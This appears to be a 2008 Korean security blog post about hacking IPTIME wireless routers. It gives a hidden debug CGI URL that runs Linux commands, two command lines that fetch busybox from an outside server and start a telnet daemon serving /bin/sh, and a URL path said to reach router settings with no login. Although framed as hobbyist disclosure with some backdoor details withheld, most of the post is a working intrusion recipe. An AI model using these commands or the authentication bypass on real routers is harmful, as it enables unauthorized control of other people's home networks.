본문으로 바로가기

IPTIME 무선공유기 해킹

category Security/Web 2008. 2. 12. 09:34
반응형

백도어에 대한 내용은 피해자를 유발할 수 있으므로 삭제했습니다.

디버그 모드에 관한 내용은 유용할 거 같아서 일단 놔둘 생각입니다. 이 기능은 계속 있었으면 좋겠네요.

http://공유기주소/cgi-bin/timepro.cgi?flag=debug를 입력하면 이상한 놈이 나옵니다.(최신버전은 debug 대신 bluesky입니다..)

리눅스 명령어를 실행할 수 있습니다.(약간 불편하네요)

여기서 http라는 wget와 비슷한 역할을 하는 프로그램을 찾아서 busybox를 올린 뒤(내장 busybox는 기능이 얼마 없더군요)

busybox에 들어있는 telnetd를 이용하여 putty로 접속했더니..

셸을 띄울 수 있었습니다.

/sbin/http get http://서버/busybox > /tmp/busybox &
/tmp/busybox telnetd -l /bin/sh 2> /tmp/log &

이렇게 입력하면 텔넷 데몬이 가동되어 접속할 수 있습니다(내부 네트웤에서만 가능합니다).



 

http://IP:1234/cgi-bin/timepro.cgi?tmenu=main_frame&smenu=main_frame

로그인 암호 걸려있어도, 인증 절차없이 바로 시스템 셋팅 화면이 나옵니다.

1234는 port-번호, ????는 위의 이미지에서 가려진 글.

외부에서 공유기의 설정을 바꿀 수 있게 셋팅하면 (이 때, port번호 정하죠)

위의 경로로 접근시 인증절차 없이 바로 셋팅 화면이 나옵니다.

[니 칼은 니가 갈아라]


 

반응형

'Security > Web' 카테고리의 다른 글

싸이월드 xss  (0) 2008.12.20
네이버XSS  (0) 2008.09.02
IPTIME 무선공유기 해킹  (0) 2008.02.12
HDSI 사용법  (0) 2007.10.22
File Upload 시의 알고리즘 주의할점  (1) 2007.08.14
HackShield 의 구동원리&우회  (10) 2007.08.12

댓글을 달아 주세요